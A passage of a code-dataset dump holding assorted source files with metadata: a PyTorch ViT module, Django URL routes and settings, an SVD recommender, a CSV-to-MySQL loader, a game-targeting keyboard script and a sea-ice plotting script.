4gl\r\n# dimana satu batch tersebut menjadi satu jurnal transaksi\r\n# tertentu lalu merubahnya menjadi paket untuk dirubah\r\n# menjadi candidate jurnal\r\n#**********************************************************\r\ndef create_candidateJurnal(config,body_message,returnpacket):\r\n #config.SendDebugMsg('test coba')\r\n # siapkan struktur paket\r\n ph = config.AppObject.CreatePacket()\r\n packet = ph.Packet\r\n packet.AddDataPacketStructureEx('__CandJournalBlock', \\\r\n 'subSystemCode:string;classID:string;keyID:integer;accountLinkType:string;')\r\n packet.AddDataPacketStructureEx('__CandJournal', \\\r\n 'keterangan:string;journalBlocks:__CandJournalBlock;')\r\n packet.BuildAllStructure()\r\n \r\n # parsing antara paremeter dan row\r\n splitPrmRow \t= '$'\r\n splitPrm \t= ';'\r\n splitRow \t= '%'\r\n splitInRow \t= ';'\r\n\r\n arrBody = body_message.split(splitPrmRow)\r\n arrParam = arrBody[0].split(splitPrm)\r\n arrRow = arrBody[1].split(splitRow)\r\n #data di parameter\r\n #0.keterangan , 1.user_id, 2.nama_tabel_batch, 3.no urut, 4 tanggal, 5.kode aplikasi\r\n\r\n dsCJ = packet.AddNewDataset('__CandJournal')\r\n rec = dsCJ.AddRecord()\r\n rec.keterangan = arrParam[0]\r\n\r\n rJB = rec.journalBlocks.AddRecord()\r\n rJB.subSystemCode = \"interface\"\r\n rJB.classID = arrParam[1]\r\n rJB.keyID = arrParam[2]\r\n rJB.systemId = \"interface\"\r\n\r\n #testing\r\n \"\"\"\r\n config.SendDebugMsg('rec.keterangan :' + rec.keterangan)\r\n config.SendDebugMsg('rJB.classID :' + rJB.classID)\r\n config.SendDebugMsg('rJB.keyID :' + str(rJB.keyID))\r\n \"\"\"\r\n \r\n # kirim dalam bentuk paket\r\n\r\n dsRP = packet.AddNewDatasetEx('__JournalBlock', \\\r\n 'idBatch:integer;journalBlockID:integer')\r\n config.BeginTransaction()\r\n try :\r\n config.SendDebugMsg(\"try\")\r\n\r\n RemoteCreateJournal.main(config,dsCJ,dsRP)\r\n config.Commit()\r\n return 1\r\n except :\r\n config.Rollback()\r\n return -1\r\n # normal kembalikan 1 \r\n","sub_path":"scripts/support_handler/create_batch.py","file_name":"create_batch.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"353210330","text":"import torch\nfrom torch import nn, einsum\nimport torch.nn.functional as F\n\nfrom einops import rearrange, repeat\nfrom einops.layers.torch import Rearrange\n# helpers\n\ndef pair(t):\n return t if isinstance(t, tuple) else (t, t)\n\n# classes\n\nclass PreNorm(nn.Module):\n def __init__(self, dim, fn):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n def forward(self, x, **kwargs):\n return self.fn(self.norm(x), **kwargs)\n\nclass FeedForward(nn.Module):\n def __init__(self, dim_in, hidden_dim, dim_out, dropout = 0.):\n super().__init__()\n self.net = nn.Sequential(\n nn.Linear(dim_in, hidden_dim),\n nn.GELU(),\n nn.Dropout(dropout),\n nn.Linear(hidden_dim, dim_out),\n nn.Dropout(dropout)\n )\n def forward(self, x):\n return self.net(x)\n\n\nclass SpatialAttention(nn.Module):\n def __init__(self):\n super().__init__()\n\n def similarity(self, spatial_embedding):\n e0 = spatial_embedding.unsqueeze(2)\n e1 = spatial_embedding.unsqueeze(1)\n dist = (e0 - e1).norm(2, dim=-1)\n sim = (-dist.pow(2)).exp()\n sim = sim / sim.sum(dim=-1, keepdims=True)\n return sim\n\n def forward(self, spatial_embedding, z):\n # The relation to Attention is as follows:\n # spatial_embedding is used as key and query\n # z is used as value\n attn = self.similarity(spatial_embedding)\n out = einsum('b i j, b j d -> b i d', attn, z)\n return out\n\n # b, n, _, h = *x.shape, self.heads\n # qkv = self.to_qkv(x).chunk(3, dim = -1)\n # q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv)\n\n # dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale\n # attn = self.attend(dots)\n\n # out = einsum('b h i j, b h j d -> b h i d', attn, v)\n # out = rearrange(out, 'b h n d -> b n (h d)')\n # return self.to_out(out)\n\nclass SpatialTransformer(nn.Module):\n def __init__(self, spatial_dim, z_dim, depth, mlp_dim, dropout=0.):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(nn.ModuleList([\n SpatialAttention(),\n PreNorm(z_dim, FeedForward(\n z_dim, mlp_dim, z_dim, dropout=dropout)),\n PreNorm(z_dim, FeedForward(\n z_dim, mlp_dim, spatial_dim, dropout=dropout))\n ]))\n\n def forward(self, z, spatial_embedding):\n for attn, ffz, ffs in self.layers:\n z = attn(spatial_embedding, z)\n z = ffz(z) + z\n spatial_embedding = ffs(z) + spatial_embedding\n return z, spatial_embedding\n\nclass SpatialViT(nn.Module):\n def __init__(self, spatial_dim, z_dim, depth, mlp_dim,\n dropout = 0., \n emb_dropout = 0.):\n super().__init__()\n\n self.dropout = nn.Dropout(emb_dropout)\n self.transformer = SpatialTransformer(\n spatial_dim, z_dim, depth, mlp_dim, dropout)\n\n def forward(self, z, spatial_embedding):\n z = self.dropout(z)\n z, spatial_embedding = self.transformer(z, spatial_embedding)\n return z, spatial_embedding\n","sub_path":"vit_pytorch/spatialvit.py","file_name":"spatialvit.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"437748690","text":"from django.conf.urls import url\nfrom demo import views\n\nurlpatterns = [\n # 主页\n url(r'^$', views.index, name='index'),\n url(r'^index.html$', views.index, name='index'),\n\n # 动力监控\n url(r'^switch/$', views.switch, name='switch'),\n url(r'^distribution_box/$', views.distribution_box, name='distribution_box'),\n url(r'^dynamo/$', views.dynamo, name='dynamo'),\n url(r'^air_pump/$', views.air_pump, name='air_pump'),\n\n # 环境监控\n url(r'^fresh_air/$', views.fresh_air, name='fresh_air'),\n url(r'^exhaust/$', views.exhaust, name='exhaust'),\n\n url(r'^humiture/$', views.humiture, name='humiture'),\n url(r'^leakage/$', views.leakage, name='leakage'),\n url(r'^lighting/$', views.lighting, name='lighting'),\n\n url(r'^smoke/$', views.smoke, name='smoke'),\n url(r'^protection/$', views.protection, name='protection'),\n # 销售管理\n\n url(r'^customer/$', views.customer, name='customer'),\n url(r'^order/$', views.order, name='order'),\n\n # 生产数据\n url(r'^bom/$', views.bom, name='bom'),\n url(r'^basic_data/$', views.basic_data, name='basic_data'),\n url(r'^technology/$', views.technology, name='technology'),\n url(r'^archives/$', views.archives, name='archives'),\n\n # 生产管理\n url(r'^scheduling/$', views.scheduling, name='scheduling'),\n\n url(r'^purchase/$', views.purchase, name='purchase'),\n url(r'^depute/$', views.depute, name='depute'),\n url(r'^rate/$', views.rate, name='rate'),\n\n # 采购管理\n\n url(r'^supply/$', views.supply, name='supply'),\n url(r'^buy/$', views.buy, name='buy'),\n # 库存管理\n url(r'^material/$', views.material, name='material'),\n url(r'^finished/$', views.finished, name='finished'),\n url(r'^accessories/$', views.accessories, name='accessories'),\n\n # 安保监控\n url(r'^people/$', views.people, name='people'),\n url(r'^video/$', views.video, name='video'),\n\n\n # 小功能块\n # 发送邮件\n url(r'^send_email/$', views.send_email, name='send_email'),\n\n # 警报灯\n url(r'^start_warn/$', views.start_warn, name='start_warn'),\n url(r'^stop_warn/$', views.stop_warn, name='stop_warn'),\n\n\n # 风扇\n url(r'^start_fan/$', views.start_fan, name='start_fan'),\n url(r'^stop_fan/$', views.stop_fan, name='stop_fan'),\n\n # 照明灯\n url(r'^start_light/$', views.start_light, name='start_light'),\n url(r'^stop_light/$', views.stop_light, name='stop_light'),\n\n\n\n url(r'^recv_data/$', views.recv_data, name='recv_data'),\n url(r'^test/$', views.test, name='test'),\n url(r'^cam/$', views.cam, name='cam'),\n\n\n]\n","sub_path":"python3/django-all/web/demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"535529710","text":"from zope import schema,interface\nfrom interfaces import *\n\nclass ViewReferenceField(schema.Object):\n interface.implements(IViewReferenceField)\n\n def __init__(self,**kw):\n super(ViewReferenceField,self).__init__(IViewReference,\n **kw)\n \nclass ImageReferenceField(schema.Object):\n interface.implements(IImageReferenceField)\n size = schema.fieldproperty.FieldProperty(IImageReferenceField['size'])\n \n def __init__(self,**kw):\n self.size = kw.pop('size',None)\n super(ImageReferenceField,self).__init__(IImageReference,\n **kw)\n\nclass ObjectReferenceField(ViewReferenceField):\n\n interface.implements(IObjectReferenceField)\n\n def __init__(self,refSchema,**kw):\n self.refSchema = refSchema\n super(ObjectReferenceField,self).__init__(**kw)\n\n","sub_path":"z3c.reference/tags/0.0.0/src/z3c/reference/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"311958610","text":"#coding=utf-8\n#!/usr/bin/python\nimport re;\n#命令组的语法是 Python 专用扩展之一: (?P...)。名字很明显是组的名字。除了该组有个名字之外,命名组也同捕获组是相同的。`MatchObject` 的方法处理捕获组时接受的要么是表示组号的整数,要么是包含组名的字符串。命名组也可以是数字,所以你可以通过两种方式来得到一个组的信息:\n#!python\n\nstr=\"5/results/\";\nreg=re.compile(r'^(?P[0-9]+)/results/$');\nprint(reg.match(str).group('question_id'));\nprint(reg.match(str).groups());\n\nstr=\"_1010_compute_panel_group.py\"\n\n","sub_path":"regex_P_group_urls.py","file_name":"regex_P_group_urls.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"341291754","text":"from tkinter import *\r\nimport openai\r\n\r\nwith open('key.txt', 'r') as f:\r\n openai.api_key = f.read()[:-1]\r\n\r\ndef Codex(text, stop):\r\n request = text.get(1.0, text.index(INSERT)).splitlines()[-1]\r\n result = AI_answer(request + '\\n', stop)\r\n text.insert(text.index(INSERT), '\\n' + result)\r\n\r\ndef AI_answer(string, stop=None):\r\n\r\n response = openai.Completion.create(\r\n engine=\"davinci-codex\",\r\n prompt=string,\r\n temperature=0.4,\r\n max_tokens=1000,\r\n top_p=1,\r\n frequency_penalty=0.5,\r\n presence_penalty=0,\r\n stop=stop\r\n )\r\n return response['choices'][0]['text']\r\n","sub_path":"code/Codex.py","file_name":"Codex.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"155324422","text":"# ------------------------------------------------------------------------------\n#\n# Project: Master Inventory \n# Authors: Fabian Schindler \n#\n# ------------------------------------------------------------------------------\n# Copyright (C) 2016 European Space Agency\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies of this Software or works derived from this Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n# ------------------------------------------------------------------------------\n\n\n\"\"\"\nDjango settings for minv project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nfrom minv.config import GlobalReader\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nMINV_CONFIG_DIR = '/etc/minv'\nMINV_DATA_DIR = '/srv/minv'\nMINV_LOCK_DIR = '/tmp/minv/lock'\nMINV_TASK_MODULES = [\n 'minv.tasks.harvest',\n 'minv.inventory.collection.export',\n 'minv.inventory.backup',\n]\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '{{ secret_key }}'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nTEMPLATE_DEBUG = DEBUG\n\nALLOWED_HOSTS = [\"*\"]\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.gis',\n 'minv',\n 'minv.inventory',\n 'minv.tasks',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n)\n\nROOT_URLCONF = '{{ project_name }}.urls'\n\nWSGI_APPLICATION = '{{ project_name }}.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nreader = GlobalReader(os.path.join(MINV_CONFIG_DIR, 'minv.conf'))\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n 'HOST': reader.host,\n 'PORT': reader.port,\n 'NAME': reader.database,\n 'USER': reader.user,\n 'PASSWORD': reader.password\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nDATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'\n\nSHORT_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'\n\nDATETIME_FORMAT = 'c'\n\nSHORT_DATETIME_FORMAT = 'c'\n\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/minv_static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n\nLOGIN_URL = '/login'\n\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(levelname)s: %(message)s'\n },\n 'verbose': {\n 'format': '[%(asctime)s][%(module)s] %(levelname)s: %(message)s'\n }\n },\n 'handlers': {\n 'file': {\n 'level': reader.log_level,\n 'formatter': 'verbose',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': '/var/log/minv/minv.log',\n },\n 'django_file': {\n 'level': reader.log_level,\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': '/var/log/minv/django.log',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['django_file'],\n 'level': reader.log_level,\n 'propagate': True,\n },\n 'minv': {\n 'handlers': ['file'],\n 'level': reader.log_level,\n 'propagate': True,\n },\n },\n}\n","sub_path":"minv/instance_template/project_name/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"392749136","text":"import random\nimport pandas as pd\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport scipy.sparse as sp\nimport torch.utils.data as data\nfrom tqdm import tqdm\nfrom utils import Interactions\nimport os\nfrom sklearn import preprocessing\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.utils.extmath import randomized_svd\n\n# 设置是否使用隐式反馈\nIMPLICT=False\n# 设置是否使用超小数据集测试\nSMALL=False\n\n# for reproducibility\ndef seed_everything(seed=1234):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\nseed_everything()\n\n# To compute probalities\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n# 获得dataloader,将数据读入后使用Interactions加载,Interactions是pytorch的取样器,可以返回df对应的u,i,r,详情见utils.py\ndef getDataLoader(data_path, batch_size=2048):\n # load train data\n data_fields = ['user_id', 'item_id', 'rating', 'timestamp']\n # all data file\n data_df = pd.read_table(data_path, names=data_fields)\n if SMALL:\n data_df = data_df.sample(n=int(len(data_df) * 0.1), replace=False)\n if IMPLICT:\n data_df.rating = (data_df.rating >= 5).astype(np.float32)\n\n # 数据离散化编码\n le = preprocessing.LabelEncoder()\n le.fit(data_df['user_id'])\n data_df['user_id']=le.transform(data_df['user_id'])\n le.fit(data_df['item_id'])\n data_df['item_id']=le.transform(data_df['item_id'])\n\n df_train = data_df.sample(n=int(len(data_df) * 0.8), replace=False)\n df_test = data_df.drop(df_train.index, axis=0)\n\n # get user number\n n_users = max(data_df['user_id'].values)+1\n # get item number\n n_items = max(data_df['item_id'].values)+1\n\n print(\"Initialize end.The user number is:%d,item number is:%d\" % (n_users, n_items))\n train_loader = data.DataLoader(\n Interactions(df_train), batch_size=batch_size, shuffle=True)\n\n test_loader = data.DataLoader(\n Interactions(df_test), batch_size=batch_size, shuffle=False)\n\n loaders = {'train': train_loader,\n 'valid': test_loader}\n\n return (n_users,n_items ), loaders\n\n#\nclass SVD(torch.nn.Module):\n def __init__(self, n_users, n_items, n_factors=80,topn=10, sparse=False, device=torch.device(\"cpu\")):\n super(SVD, self).__init__()\n\n self.n_users = n_users\n self.n_items = n_items\n self.device = device\n self.topn = topn\n # get factor number\n self.n_factors = n_factors\n self.user_vec=None\n self.item_vec=None\n self=self.to(self.device)\n\n def _convert_df(self, user_num, item_num, df):\n ratings = list(df['rating'])\n rows = list(df['user_id'])\n cols = list(df['item_id'])\n mat = sp.csr_matrix((ratings, (rows, cols)), shape=(user_num, item_num))\n\n return mat\n\n def fit(self,loaders):\n # load train data\n data_fields = ['user_id', 'item_id', 'rating', 'timestamp']\n # all data file\n data_path=\"u.data\"\n data_df = pd.read_table(data_path, names=data_fields)\n print(\" SVD START\")\n train_set = self._convert_df(self.n_users, self.n_items, data_df)\n U, sigma, Vt = randomized_svd(train_set,\n n_components=self.n_factors,\n random_state=2020)\n s_Vt = sp.diags(sigma) * Vt\n print('SVD END')\n self.user_vec = U\n self.item_vec = s_Vt.T\n\n def predict(self, u, i):\n return self.user_vec[u, :].dot(self.item_vec[i, :])\n\n\nif __name__ == '__main__':\n input_size, loader=getDataLoader(\"u.data\")\n # 从getDataLoader中得到模型需要的初始化参数,如用户数与物品数\n model = SVD(input_size[0],input_size[1])\n model.fit()\n","sub_path":"ch3/svd.py","file_name":"svd.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"530715384","text":"import unittest\nfrom stemmer import Stemmer\nfrom tokenizer import Token, Tokenizer\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n self.assertEqual(True, True)\n\n def test_stemmer(self):\n line = \"мамочка свари суп\"\n #tok = Tokenizer().tokenize_alph(line)\n\n fact = list(Stemmer().stem(Token(0, 7, line, 'a'), 4, line))\n\n check = [Token(0, 7, line, 'a'), Token(0, 6, line, 'a'),\n Token(0, 5, line, 'a'), Token(0, 4, line, 'a'), Token(0, 3, line, \"a\")]\n\n fact1 = list(Stemmer().stem(Token(14, 17, line, \"a\"), 4, line))\n check1 = [Token(14, 17, line, \"a\")]\n\n self.assertEqual(fact, check)\n self.assertEqual(fact1, check1)\n\n def test_stemmer_flex(self): \n\n line = \"мамочка свари суп\"\n\n fact = list(Stemmer().stem_flex(Token(0, 8, \"мамочка свари суп\", \"a\")))\n check = [Token(0, 8, line, 'a'), Token(0, 7, line, 'a')]\n\n self.assertEqual(fact, check)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_stemmer.py","file_name":"test_stemmer.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"252254706","text":"# -*- coding: utf-8 -*-\nimport settings\nfrom mysql import db\nimport os, time\nimport csv\nimport re\nimport sfhd_origin_data_extract\nclass data_to_mysql():\n def __init__(self):\n pass\n\n\n\n def get_time(self, file_name):\n # file_name = \"sfhd_origin_20160501.csv\"\n t = re.sub(\"\\D\", \"\", file_name)\n print(t)\n s = t[0:4] + \"-\" + t[4:6] + \"-\" + t[6:] + \" 00:00:00\"\n st = int(time.mktime(time.strptime(s, \"%Y-%m-%d %H:%M:%S\")))\n # print(st)\n e = t[0:4] + \"-\" + t[4:6] + \"-\" + t[6:] + \" 23:59:59\"\n et = int(time.mktime(time.strptime(e, \"%Y-%m-%d %H:%M:%S\")))\n # print(et)\n #返回类型为 INT 类型\n return st, et\n\n # 将数据存到mysql中的方法\n def data_stored_mysql(self, file_name, table_name):\n csvfile = open(file_name, 'r')\n dict_reader = csv.DictReader(csvfile)\n db.connect()\n datas = []\n freq = 0\n for row in dict_reader:\n row = dict(row)\n # 创建表\n columns = []\n for i in row.keys():\n columns.append(i)\n if (db.is_table_exist(table_name, settings.database) == None and freq == 0):\n db.create_table(table_name, columns)\n freq += 1\n print(\"create is ok\")\n else:\n pass\n # 插入数据\n # row['time'] = int(time.mktime(time.strptime(row['time'], '%Y-%m-%d %H:%M:%S')))\n row['time'] = int(row['time'])\n datas.append(row)\n db.insert_mysql_with_json(table_name, datas)\n print(\"insert is ok\")\n db.disconnect()\n\n # 文件存到 mysql\n def main_storeto_mysql(self, file_dir, table_name):\n file_names = []\n for root, dirs, files in os.walk(file_dir):\n fs = time.time()\n # i = 1\n for f in files:\n # if i <= 3 :\n fs_1 = time.time()\n file = \"/home/grid/sparktest/task_mysql/sfhd_origin_data/\" + f\n #调用函数data_stored_mysql 存数据到mysql\n self.data_stored_mysql(file, table_name)\n fs_2 = time.time()\n print(\"%s文件存储,消耗时间:%s \" % (f, fs_2 - fs_1))\n # i+=1\n\n fe = time.time()\n print(\"存储mysql总消耗时间:\", fe - fs)\n # pass\n\n def main_storeto_CSV(self, file_dir, table_name):\n\n for root, dirs, files in os.walk(file_dir):\n\n fs = time.time()\n # i =1\n\n for file in files:\n # if i <= 3:\n fe_1 = time.time()\n st, et = self.get_time(file)\n print(st, et)\n sfhd_origin_data_extract.time_main(st, et, table_name)\n fe_2 = time.time()\n\n print(\"存储%s消耗时间:%s\" % (file, fe_2 - fe_1))\n # i+=1\n # print(i)\n # 存三次\n\n fe = time.time()\n print(\"存储csv结束时间:\", (fe - fs))\n\n\nif __name__ == \"__main__\":\n table_name = \"originDataMonth_test_11_13\"\n dtm = data_to_mysql()\n # dtm.main_storeto_mysql(\"/home/grid/sparktest/task_mysql/sfhd_origin_data\", table_name)\n dtm.main_storeto_CSV(\"/home/grid/sparktest/task_mysql/sfhd_origin_data\", table_name)","sub_path":"sparktest/task_mysql/data_to_mysql_11_7.py","file_name":"data_to_mysql_11_7.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"170183935","text":"import keyboard\nimport pywinauto as p\nfrom time import sleep\nimport os\nimport sys\n\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nimport mouse.mouseSeal as mouse\n\nprint(\"autolock.py\")\ninventory = []\nk = p.keyboard\ntarget = 0\n\nwhile True:\n if keyboard.is_pressed(\"-\") :\n print(\"setting target\")\n sleep(0.3)\n mouse.setTarget(target)\n if keyboard.is_pressed(\"/\") :\n target = mouse.getCurrentTarget()\n print(\"Target Locked\")\n mouse.setTarget(mouse.getCurrentTarget())\n sleep(0.2)","sub_path":"autolock.py","file_name":"autolock.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"383367735","text":"# -------------------------------------------------------------------------------\n# modules\n#\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cartopy.crs as ccrs\nimport matplotlib.gridspec as gridspec\nimport cmcrameri.cm as cmc\nfrom matplotlib.colors import BoundaryNorm, LinearSegmentedColormap\nimport matplotlib\n\nfont = {'size': 12}\nmatplotlib.rc('font', **font)\n\ndef drywet(numcolors, colormap):\n\n colors_blue = colormap(np.linspace(0.5, 1, 5))\n colors_white = np.array([1, 1, 1, 1])\n colors_brown = [[84, 48, 5, 255],\n [140, 81, 10, 255],\n [191, 129, 45, 255],\n [223, 194, 125, 255],\n [246, 232, 195, 255]]\n rgb = []\n for i in range(len(colors_brown)):\n z = [x / 255 for x in colors_brown[i]]\n rgb.append(z)\n colors = np.vstack((rgb, colors_white, colors_blue))\n\n cmap = LinearSegmentedColormap.from_list(name=colormap, colors=colors, N=numcolors)\n\n return cmap\n\n# -------------------------------------------------------------------------------\n# read data\n# %%\nvar_name = 'FR_SEA_ICE'\n\nsims = ['new', 'old', 'diff']\nfriac = {}\nlabels = {'new': 'Sea Ice update', 'old': 'Sea Ice static', 'diff': 'Difference between versions'}\n\nfor s in range(len(sims)):\n sim = sims[s]\n friac[sim] = {}\n friac[sim]['label'] = labels[sim]\n data = xr.open_dataset(f'{sim}_version.nc')\n dt = data[var_name].values[0, :, :]\n friac[sim][var_name] = dt\n# %%\nlat = xr.open_dataset('old_version.nc')['lat'].values[:]\nlon = xr.open_dataset('old_version.nc')['lon'].values[:]\nlat_, lon_ = np.meshgrid(lon, lat)\nprint(\"load done\")\n# -------------------------------------------------------------------------------\n# plot\n# %%\nar = 1.0 # initial aspect ratio for first trial\nwi = 12 # height in inches #15\nhi = 2.5 # width in inches #10\nncol = 3 # edit here\nnrow = 1\naxs, cs, gl = np.empty(shape=(nrow, ncol), dtype='object'), np.empty(shape=(nrow, ncol), dtype='object'), np.empty(shape=(nrow, ncol), dtype='object')\n\ncmap1 = cmc.davos_r\nlevels1 = np.linspace(0, 100, 21, endpoint=True)\nnorm1 = BoundaryNorm(levels1, ncolors=cmap1.N, clip=True)\n\ncmap2 = drywet(25, cmc.vik_r)\nlevels2 = np.linspace(0, 40, 11, endpoint=True)\nnorm2 = BoundaryNorm(levels2, ncolors=cmap2.N, clip=True)\n\n# change here the lat and lon\nmap_ext = [-50, 50, 40, 90]\n\nfig = plt.figure(figsize=(wi, hi))\nleft, bottom, right, top = 0.07, 0.01, 0.94, 0.95\ngs = gridspec.GridSpec(nrows=1, ncols=3, left=left, bottom=bottom, right=right, top=top,\n wspace=0.1, hspace=0.15)\n\nfor i in range(3):\n sim = sims[i]\n label = friac[sim]['label']\n axs[0, i] = fig.add_subplot(gs[0, i], projection=ccrs.PlateCarree())\n axs[0, i].set_extent(map_ext, crs=ccrs.PlateCarree())\n axs[0, i].coastlines(zorder=3)\n axs[0, i].stock_img()\n gl[0, i] = axs[0, i].gridlines(crs=ccrs.PlateCarree(), draw_labels=True, x_inline=False, y_inline=False, linewidth=1, color='grey', alpha=0.5, linestyle='--')\n gl[0, i].right_labels = False\n gl[0, i].top_labels = False\n gl[0, i].left_labels = False\n cs[0, i] = axs[0, i].pcolormesh(lon, lat, friac[sim][var_name], cmap=cmap1, norm=norm1, shading=\"auto\",\n transform=ccrs.PlateCarree())\n axs[0, i].set_title(f'{label}', fontweight='bold', pad=6, fontsize=14, loc='center')\n\ngl[0, 0].left_labels = True\n\ncax = fig.add_axes(\n [axs[0, 2].get_position().x1 + 0.01, axs[0, 2].get_position().y0, 0.01, axs[0, 2].get_position().height])\ncbar = fig.colorbar(cs[0, 1], cax=cax, orientation='vertical',\n ticks=np.linspace(0, 100, 6, endpoint=True))\ncbar.ax.tick_params(labelsize=14)\n\n\naxs[0, 0].text(-0.2, 0.5, 'Sea ice', ha='center', va='center', rotation='vertical',\n transform=axs[0, 0].transAxes, fontsize=14, fontweight='bold')\naxs[0, 2].text(1.07, 1.09, '[%]', ha='center', va='center', rotation='horizontal',\n transform=axs[0, 2].transAxes, fontsize=12)\n\nfig.show()\n# plotpath = \"/project/pr133/rxiang/figure/echam5/\"\n# fig.savefig(plotpath + 'friac' + f'{mon}.png', dpi=500)\nplt.close(fig)\n\"\"\"\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport matplotlib.ticker as mticker\nimport numpy as np\nfrom netCDF4 import Dataset\nimport mplotutils as mpu\nimport xarray as xr\nfrom matplotlib.colors import TwoSlopeNorm\n\n\n\ndef plot(filename, field, title, metric, lon, lat, max=None, min=None, \n lat_pole=90, lon_pole=-180, coastline=True, colormap=\"RdBu_r\", \n centered_bar=False): \n\n rotated_pole = ccrs.RotatedPole(pole_latitude=lat_pole, pole_longitude=lon_pole)\n data_crs = ccrs.PlateCarree()\n\n # create the plot and set the size\n plt.figure(figsize=(20,10))\n axes = plt.axes(projection= 